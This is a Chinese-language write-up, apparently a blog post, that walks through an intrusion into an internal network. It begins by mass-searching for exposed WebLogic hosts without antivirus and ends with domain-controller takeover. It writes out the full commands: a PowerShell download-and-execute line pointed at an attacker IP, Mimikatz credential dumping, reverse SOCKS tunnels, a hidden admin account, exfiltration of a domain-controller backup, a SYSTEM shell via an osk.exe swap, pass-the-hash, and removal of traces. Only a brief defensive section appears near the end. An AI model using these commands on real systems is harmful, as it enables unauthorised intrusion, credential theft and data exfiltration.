记一次完整的内网渗透经历
字数 1670 2025-08-05 12:50:18

内网渗透实战教学文档

1. 目标发现与初始入侵

1.1 目标发现

  • 使用FOFA搜索引擎批量查找Weblogic服务
  • 筛选条件:出网、无杀软(或弱防护)、有内网环境

1.2 初始入侵方法

  • 使用Cobalt Strike的"Scripted Web Delivery"模块
  • 创建web服务用于一键下载和执行PowerShell
  • 生成的PowerShell命令示例: 
    powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://攻击者IP:端口/script'))"

2. 信息收集

2.1 系统信息收集

  • 执行命令获取系统信息: 
    systeminfo
whoami /all
net config workstation
  • 关键信息:
    • 操作系统:Windows Server 2012
    • 内网IP段:192.168.200.x
    • 当前权限:通常为中等权限用户

2.2 内网扫描

  • 使用Ladon工具扫描内网: 
    Ladon 192.168.200.0/24
  • 扫描结果分析:
    • 识别域环境
    • 多网卡检测
    • Web服务检测

2.3 凭证获取

  • 使用Mimikatz获取凭证: 
    mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
  • 获取到的加密密码可通过CMD5等在线服务解密

3. 横向移动技术

3.1 MS17-010漏洞利用

  • 扫描内网MS17-010漏洞: 
    Ladon 192.168.200.0/24 MS17010
  • 利用失败时的应对策略:
    • 尝试不同EXP
    • 更换工具
    • 寻求外部帮助

3.2 代理隧道建立

  • 使用EarthWorm(EW)建立Socks代理:
    1. 攻击服务器执行: 
      ew -s rcsocks -l 1900 -e 1200
    2. 目标机器执行: 
      ew -s rssocks -d 攻击者IP -e 1200
  • 本地配置:
    • Windows:使用SocksCap配置代理
    • Kali Linux:修改/etc/proxychains.conf并前缀proxychains执行命令

3.3 共享资源利用

  • 查看共享计算机列表: 
    net view
  • 访问共享资源: 
    \\192.168.200.6\C$
  • 发现备份服务器(Veeam Backup)

4. 备份服务器利用

4.1 备份文件分析

  • 发现路径:D:\Backup\
  • 备份文件类型:Veeam® Backup & Replication软件生成
  • 备份内容:域控制器(DC)全量备份

4.2 备份文件传输

  • 创建隐藏账户: 
    net user backup$ Password123 /add
net localgroup administrators backup$ /add
  • 使用7z压缩备份文件: 
    7z a -v700m backup.7z DC_backup.vbk
  • 通过共享文件夹和Web路径传输到本地

5. 虚拟机恢复与权限提升

5.1 本地环境准备

  • 安装Veeam® Backup & Replication软件
  • 恢复虚拟机备份

5.2 PE工具箱使用

  1. 使用老毛桃生成ISO PE工具箱
  2. 挂载到恢复的虚拟机
  3. 开机按ESC进入启动菜单选择PE

5.3 权限提升技术

  • 替换osk.exe: 
    ren C:\Windows\System32\cmd.exe osk.exe
copy /y osk.exe C:\Windows\System32\
  • 登录界面点击"屏幕键盘"触发SYSTEM权限命令行
  • 修改域用户密码并添加到管理员组: 
    net user 域用户 新密码
net localgroup administrators 域用户 /add

6. 域控制器控制

6.1 上线Cobalt Strike

  • 绕过防火墙:
    • 关闭防火墙(需管理员权限)
    • 使用PowerShell方式上线

6.2 Hash获取与传递攻击

  • 使用hashdump获取域控Hash
  • 传递哈希攻击(PtH): 
    mimikatz.exe "privilege::debug" "sekurlsa::pth /user:管理员 /domain:域名 /ntlm:hash" exit

7. 清理与痕迹消除

7.1 清理隐藏账户

net user backup$ /del

7.2 恢复系统文件

  • 将原始osk.exe复制回System32目录

8. 工具清单

工具名称 用途
Cobalt Strike 远控、横向移动
Ladon 内网扫描
Mimikatz 凭证获取、PtH攻击
EarthWorm 代理隧道
7-Zip 文件压缩
Veeam Backup 备份恢复
老毛桃PE 系统修复

9. 防御建议

  1. Weblogic防护

    • 及时安装补丁
    • 限制访问IP
    • 删除不必要的示例程序

  2. 内网防护

    • 启用杀软和EDR
    • 网络分段隔离
    • 禁用不必要的共享

  3. 备份服务器防护

    • 严格访问控制
    • 备份文件加密
    • 监控异常访问

  4. 域控防护

    • 启用LSA保护
    • 限制管理员登录
    • 监控异常认证

  5. 日志监控

    • 集中收集日志
    • 设置可疑行为告警
    • 定期审计

10. 总结

本案例展示了从外网Weblogic漏洞到完全控制内网域环境的完整过程,重点技术包括:

  • 初始入侵的Web Delivery
  • 内网信息收集与扫描
  • 代理隧道的建立与使用
  • 备份服务器的利用
  • 虚拟机恢复与权限提升
  • 域控的Hash获取与PtH攻击

防御方应重点关注边界防护、内网监控和权限管理,特别是备份系统的安全防护。

内网渗透实战教学文档 1. 目标发现与初始入侵 1.1 目标发现 使用FOFA搜索引擎批量查找Weblogic服务 筛选条件:出网、无杀软(或弱防护)、有内网环境 1.2 初始入侵方法 使用Cobalt Strike的"Scripted Web Delivery"模块 创建web服务用于一键下载和执行PowerShell 生成的PowerShell命令示例: 2. 信息收集 2.1 系统信息收集 执行命令获取系统信息: 关键信息: 操作系统:Windows Server 2012 内网IP段:192.168.200.x 当前权限:通常为中等权限用户 2.2 内网扫描 使用Ladon工具扫描内网: 扫描结果分析: 识别域环境 多网卡检测 Web服务检测 2.3 凭证获取 使用Mimikatz获取凭证: 获取到的加密密码可通过CMD5等在线服务解密 3. 横向移动技术 3.1 MS17-010漏洞利用 扫描内网MS17-010漏洞: 利用失败时的应对策略: 尝试不同EXP 更换工具 寻求外部帮助 3.2 代理隧道建立 使用EarthWorm(EW)建立Socks代理: 攻击服务器执行: 目标机器执行: 本地配置: Windows:使用SocksCap配置代理 Kali Linux:修改 /etc/proxychains.conf 并前缀 proxychains 执行命令 3.3 共享资源利用 查看共享计算机列表: 访问共享资源: 发现备份服务器(Veeam Backup) 4. 备份服务器利用 4.1 备份文件分析 发现路径: D:\Backup\ 备份文件类型:Veeam® Backup & Replication软件生成 备份内容:域控制器(DC)全量备份 4.2 备份文件传输 创建隐藏账户: 使用7z压缩备份文件: 通过共享文件夹和Web路径传输到本地 5. 虚拟机恢复与权限提升 5.1 本地环境准备 安装Veeam® Backup & Replication软件 恢复虚拟机备份 5.2 PE工具箱使用 使用老毛桃生成ISO PE工具箱 挂载到恢复的虚拟机 开机按ESC进入启动菜单选择PE 5.3 权限提升技术 替换osk.exe: 登录界面点击"屏幕键盘"触发SYSTEM权限命令行 修改域用户密码并添加到管理员组: 6. 域控制器控制 6.1 上线Cobalt Strike 绕过防火墙: 关闭防火墙(需管理员权限) 使用PowerShell方式上线 6.2 Hash获取与传递攻击 使用hashdump获取域控Hash 传递哈希攻击(PtH): 7. 清理与痕迹消除 7.1 清理隐藏账户 7.2 恢复系统文件 将原始osk.exe复制回System32目录 8. 工具清单 | 工具名称 | 用途 | |---------|------| | Cobalt Strike | 远控、横向移动 | | Ladon | 内网扫描 | | Mimikatz | 凭证获取、PtH攻击 | | EarthWorm | 代理隧道 | | 7-Zip | 文件压缩 | | Veeam Backup | 备份恢复 | | 老毛桃PE | 系统修复 | 9. 防御建议 Weblogic防护 : 及时安装补丁 限制访问IP 删除不必要的示例程序 内网防护 : 启用杀软和EDR 网络分段隔离 禁用不必要的共享 备份服务器防护 : 严格访问控制 备份文件加密 监控异常访问 域控防护 : 启用LSA保护 限制管理员登录 监控异常认证 日志监控 : 集中收集日志 设置可疑行为告警 定期审计 10. 总结 本案例展示了从外网Weblogic漏洞到完全控制内网域环境的完整过程,重点技术包括: 初始入侵的Web Delivery 内网信息收集与扫描 代理隧道的建立与使用 备份服务器的利用 虚拟机恢复与权限提升 域控的Hash获取与PtH攻击 防御方应重点关注边界防护、内网监控和权限管理,特别是备份系统的安全防护。